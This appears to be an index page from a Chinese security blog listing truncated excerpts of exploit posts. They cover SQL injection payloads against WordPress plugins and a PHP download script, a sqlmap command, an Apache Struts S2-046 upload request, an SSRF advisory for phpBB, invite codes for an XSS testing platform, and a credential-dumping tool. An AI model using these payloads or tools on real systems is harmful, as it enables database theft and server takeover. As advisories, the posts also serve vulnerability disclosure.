• Xss测试平台邀请码[12月4日更新]

    Xss测试平台邀请码[12月4日更新]
    Links:http://xss.re/ 2015年11月30日 23:20 重新开启 邀请码: d0bee52a6dd0f7a770d109cffa31a49d a49fd8767a827b5d9c6075d0cc6e3e91 eb00f5a5c36d03055c7807c7c716fb24 5d85d80499b324c6596b501265a43ea6 e31b55764ce905cd3aa17734b1898509 16943fffcecd1759e3314df762aa215a accde626f685af525164571219d197dc c87c11639bd4170b9863392f4787682d ff169ce65b6006269b817a...
    作者:unhonker| 发布:2013年1月08日 | 分类:个人关注 | 被撸:77,284次| 标签:
  • phpBB 3.2.0 Server Side Request Forgery

    phpBB 3.2.0 Server Side Request Forgery
    title: Server Side Request Forgery Vulnerability product: phpBB vulnerable version: 3.2.0 fixed version: 3.2.1 CVE number: impact: Medium homepage: https://www.phpbb.com/ found: 2017-05-21 by: Jasveer Singh (Office Kuala Lumpur) SEC Consult V...
    作者:unhonker| 发布:2017年8月07日 | 分类:漏洞公布 | 被撸:136次| 标签:
  • WordPress Ultimate Product Catalogue 4.2.2 Plugin – SQL Injection

    WordPress Ultimate Product Catalogue 4.2.2 Plugin – SQL Injection
    # Version: 4.2.2 # Tested on: Ubuntu 16.04 1 – Description: Type user access: register user. $_POST[‘CatID’] is not escaped. Ultimate Product Catalogue 4.2.2 Sql Injection 2 – Proof of Concept: 1 – Login as regular user (created using wp-login.php?action=register): 2 – Using: *delete “*” in code* 3 – Timeline: – 22/05...
    作者:unhonker| 发布:2017年6月28日 | 分类:漏洞公布 | 被撸:732次| 标签:
  • WordPress Huge-IT Video Gallery 2.0.4 SQL注入

    WordPress Huge-IT Video Gallery 2.0.4 SQL注入
    Advisory ID: DC-2017-01-009 SQL injection Vulnerable Function: $wpdb->get_var( $query ); Vulnerable Variable: $_POST['cat_search'] Vulnerable URL: http://www.vulnerablesite.com/wp-admin/admin.php?page=video_galleries_huge_it_video_gallery Vulnerable Body: cat_search=DefenseCode AND (SELECT * FROM (SELECT(SLEE...
    作者:unhonker| 发布:2017年5月30日 | 分类:漏洞公布 | 被撸:992次| 标签:
  • WordPress KittyCatfish 2.2 Plugin SQL Injection Vulnerability

    WordPress KittyCatfish 2.2 Plugin SQL Injection Vulnerability
    1. Description An unescaped parameter was found in KittyCatfish version 2.2 (WP plugin). An attacker can exploit this vulnerability to read from the database. The get oarameter ‘kc_ad’ is vulnerable. 2. Proof of concept sqlmap -u "http://192.168.20.39/wp-content/plugins/kittycatfish/base.css.php?kc_ad=31&ver=2.0""...
    作者:unhonker| 发布:2017年4月26日 | 分类:漏洞公布 | 被撸:958次| 标签:
  • Linux下密码抓取神器mimipenguin

    Linux下密码抓取神器mimipenguin
    下载地址:https://github.com/huntergregal/mimipenguin 需要root权限。 以下环境测试通过 Kali 4.3.0 (rolling) x64 (gdm3) Ubuntu Desktop 12.04 LTS x64 (Gnome Keyring 3.18.3-0ubuntu2) Ubuntu Desktop 16.04 LTS x64 (Gnome Keyring 3.18.3-0ubuntu2) XUbuntu Desktop 16.04 x64 (Gnome Keyring 3.18.3-0ubuntu2) VSFTPd 3.0.3-8+b1 (Active FTP client connections...
    作者:unhonker| 发布:2017年4月06日 | 分类:个人关注 | 被撸:1,077次| 标签:
  • S2-046 PoC

    S2-046 PoC
    POST /doUpload.action HTTP/1.1 Host: localhost:8080 Content-Length: 10000000 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAnmUgTEhFhOZpr9z Connection: close ------WebKitFormBoundaryAnmUgTEhFhOZpr9z Content-Disposition: form-data; name="upload"; filename="%{#context['com.opensymphony.xwork2.dispatche...
    作者:unhonker| 发布:2017年3月21日 | 分类:漏洞公布 | 被撸:1,535次| 标签:
  • Fiyo CMS 2.0.6.1 权限提升漏洞

    Fiyo CMS 2.0.6.1 权限提升漏洞
    # Exploit Title: Privilege Escalation (Manipulation of User Group) Vulnerability on Fiyo CMS 2.0.6.1 # Google Dork: no # Date: 11-03-2017 # Exploit Author: @rungga_reksya, @dvnrcy # Vendor Homepage: http://www.fiyo.org # Software Link: https://sourceforge.net/projects/fiyo-cms # Version: 2.0.6.1 # Tested on: Windows Server 2012 Datacent...
    作者:unhonker| 发布:2017年3月13日 | 分类:漏洞公布 | 被撸:1,149次| 标签:
  • st2-045测试工具

    st2-045测试工具
    相信有不少运维朋友又要加班加点的打补丁了。 本工具仅用作探测自有资产是否存在该漏洞,请勿用于其他用途,否则后果自负。 测试工具: st2-045ihonker专版 修复意见: 升级st2框架
    作者:unhonker| 发布:2017年3月07日 | 分类:漏洞公布 | 被撸:2,555次| 标签:
  • MySQL文件上传-ID参数SQL注入

    MySQL文件上传-ID参数SQL注入
    SQL Injection/Exploit : # http://localhost/[PATH]/download.php?id=[SQL]&t=files # -9999'+/*!50000union*/+select+1,concat_ws(un,0x3c62723e,0x3c62723e,pw),3,4,5,6+from+admin-- -&t=files # http://localhost/[PATH]/download.php?id=[SQL]&t=images_title # -9999'+/*!50000union*/+select+1,concat_ws(un,0x3c62723e,0x3c62723e,pw),3,4,5,6,7+...
    作者:unhonker| 发布:2017年2月08日 | 分类:漏洞公布 | 被撸:1,450次|